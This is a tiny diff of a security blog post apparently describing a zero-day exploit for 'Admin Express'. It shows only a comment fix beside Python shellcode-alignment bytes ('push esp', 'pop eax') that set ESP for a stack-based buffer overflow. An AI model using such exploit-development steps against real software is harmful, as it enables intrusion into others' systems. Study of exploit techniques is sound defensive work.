deveshm/connormcgarr.github.io/_posts/2019-05-13-Admin-Express-0day.md

 # Stack alignment
 # Need to make ESP 0x012F3F4.
 Using sub method to write that value onto the stack.
-# After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
+# After making ESP 0x012F3F4, it should be the same value as EAX - so we can write up the stack.
 alignment = "\x54" # push esp
 alignment += "\x58" # pop eax; (puts the value of ESP into EAX)